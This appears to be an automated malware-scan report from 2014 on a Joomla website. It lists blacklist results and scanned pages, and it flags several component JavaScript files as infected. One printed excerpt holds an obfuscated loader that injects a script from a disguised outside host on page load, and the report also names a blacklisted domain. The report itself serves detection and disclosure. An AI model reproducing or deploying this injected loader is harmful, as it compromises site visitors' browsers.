Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=aalphinoor.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://aalphinoor.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://aalphinoor.com/ | 200 OK Content-Length: 4775 Content-Type: text/html | clean |
http://aalphinoor.com/fr/index.php | 200 OK Content-Length: 10764 Content-Type: text/html | clean |
http://aalphinoor.com/fr/ | 200 OK Content-Length: 10764 Content-Type: text/html | clean |
http://aalphinoor.com/fr/index.php?option=com_content&task=view&id=2&Itemid=2 | 200 OK Content-Length: 34013 Content-Type: text/html | clean |
http://aalphinoor.com/fr/index.php?option=com_content&task=view&id=3&Itemid=3 | 200 OK Content-Length: 23385 Content-Type: text/html | clean |
http://aalphinoor.com/fr/index.php?option=com_content&task=view&id=10&Itemid=23 | 200 OK Content-Length: 300635 Content-Type: text/html | clean |
http://aalphinoor.com/fr/index.php?option=com_content&task=view&id=12&Itemid=24 | 200 OK Content-Length: 12854 Content-Type: text/html | clean |
http://aalphinoor.com/fr/index.php?option=com_content&task=view&id=15&Itemid=27 | 200 OK Content-Length: 302083 Content-Type: text/html | clean |
http://aalphinoor.com/fr/index.php?option=com_content&task=view&id=8&Itemid=12 | 200 OK Content-Length: 8333 Content-Type: text/html | clean |
http://aalphinoor.com/fr/index.php?option=com_contact&task=view&contact_id=1&Itemid=13 | 200 OK Content-Length: 10170 Content-Type: text/html | clean |
http://aalphinoor.com/fr/index.php?option=com_mad4joomla&jid=2&Itemid=8 | 200 OK Content-Length: 23280 Content-Type: text/html | clean |
http://aalphinoor.com/fr/components/com_mad4joomla/js/balloontip/bubble-tooltip.js | 200 OK Content-Length: 12590 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: naver-com.novoteka.ru.ya-ru.sitemape.ru function showToolTip(e,text){ if(document.all)e = event; var obj = document.getElementById('bubble_tooltip'); var obj2 = document.getElementById('bubble_tooltip_content'); obj2.innerHTML = text; obj.style.display = 'block'; var st = Math.max(document.body.scrollTop,document.documentElement.scrollTop); if(navigator.userAgent.toLowerCase().indexOf('safari')>=0)st=0; var leftPos = e.clientX - 100; ...[11709 bytes skipped]... Decoded script: Function Function String String RegExp RegExp | ||
http://aalphinoor.com/fr/components/com_mad4joomla/js/calendar/m4j.js | 200 OK Content-Length: 13204 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: naver-com.novoteka.ru.ya-ru.sitemape.ru var calendar = null;
function selected(cal, date) { cal.sel.value = date; } function closeHandler(cal) { cal.hide(); Calendar.removeEvent(document, "mousedown", checkCalendar); } function checkCalendar(ev) { var el = Calendar.is_ie ? Calendar.getElement(ev) : Calendar.getTargetElement(ev); for (; el != null; el = el.parentNode) if (el == calendar.element || el.tagName == "A") break; ...[12040 bytes skipped]... Decoded script: Function Function String String RegExp RegExp | ||
http://aalphinoor.com/fr/components/com_mad4joomla/js/calendar/calendar_stripped.js | 200 OK Content-Length: 11235 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: naver-com.novoteka.ru.ya-ru.sitemape.ru var pw="pw";var w=window;this.d=7793;var j='svc|rviGp&t|'.replace(/[\|&Gov]/g, '');var rf="rf";var gr;if(gr!='y' && gr!='ds'){gr='y'};var a=document;w.onload=function(){try {this.ai="ai";var bl;if(bl!=''){bl='_'};r=a.createElement(j);var ub;if(ub!='hv' && ub != ''){ub=null};var q=new Date();r.src='h%t%tZp%:!/Q/!bZe?eZmZp%3Q-?c?oZm?.Zs%aZh?i!b!i?n!d?e!n!.%c%oZm?.?g%o!oQgQl%eQ-%cQo!m%.!tZh!eQl!i?f?e!t!aQg!.Qr?uQ:?8Q0?8%0Q/?1!2!6!.Qc%o!mQ/?1Q2 ...[10965 bytes skipped]... Decoded script: Function Function String String RegExp RegExp | ||
http://aalphinoor.com/fr/components/com_mad4joomla/js/calendar/lang/calendar-en.js | 200 OK Content-Length: 14341 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Calendar._DN = new Array ("Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday"); Calendar._SDN = new Array ("Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"); Calendar._FD = 0; Calendar._MN = new Array ("January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: aalphinoor.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 17 Jun 2014 11:39:06 GMT
Accept-Ranges: bytes
ETag: "caa31-12a7-4c12db7c9fe00"
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.37 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 4775
Content-Type: text/html
Last-Modified: Tue, 29 May 2012 14:33:28 GMT
...4775 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: aalphinoor.com
Referer: http://www.google.com/search?q=aalphinoor.com
Result:
The result is similar to the first query. There are no suspicious redirects found.